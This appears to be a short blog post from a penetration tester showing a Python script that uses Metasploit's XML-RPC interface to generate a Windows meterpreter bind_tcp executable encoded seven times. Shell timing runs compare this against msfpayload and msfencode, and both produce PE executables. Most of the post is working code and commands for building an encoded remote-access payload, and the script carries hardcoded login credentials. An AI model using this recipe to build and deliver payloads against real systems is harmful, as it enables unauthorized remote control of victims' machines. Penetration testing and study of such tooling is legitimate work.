I wrote a quick xmlrpc test to get an executable payload from Metasploit encoding it 7 times with whatever encoder it thinks is best. The code I'm using hasn't been committed or submitted yet, but if you want to test it I can provide you a patch until I'm happy enough with it to submit it.
import xmlrpclib
import binascii
proxy = xmlrpclib.ServerProxy("http://localhost:55553")
ret = proxy.auth.login("msf","abc123")
if ret['result'] == 'success':
token = ret['token']
else:
print "Could not login\n"
opts = {
"Format" : 'exe',
"Iterations" : 7,
"ForceEncode" : True}
ret = proxy.module.execute(token,"payload","windows/meterpreter/bind_tcp",opts)
if(ret['result'] == 'success'):
print binascii.unhexlify(ret['payload'])
Next.. I decided to do a test of the xmlrpc vs the traditional way of doing it:
root@bt:~/msfmods/py# time (python get_payload.py > /tmp/test3)
real 0m3.839s
user 0m0.020s
sys 0m0.043s
root@bt:~/msfmods/py# time (~/metasploit/msfpayload windows/meterpreter/bind_tcp raw | ~/metasploit/msfencode -t exe -c 5 -o /tmp/test2 2>/dev/null )
real 0m10.548s
user 0m7.553s
sys 0m2.920s
root@bt:~/msfmods/py# file /tmp/test2 /tmp/test3
/tmp/test2: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit
/tmp/test3: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit
It definitely appears we have a speed increase, and with the additional overhead of an auth in the way, it's possible to take a little bit more time off of it. Being able to do this over XMLRPC hopefully will give a good way for folks to grab payloads remotely and easily for common tasks.
Have thoughts or suggestions ?
Hit me up at sussurro [aT] happypacket DOT net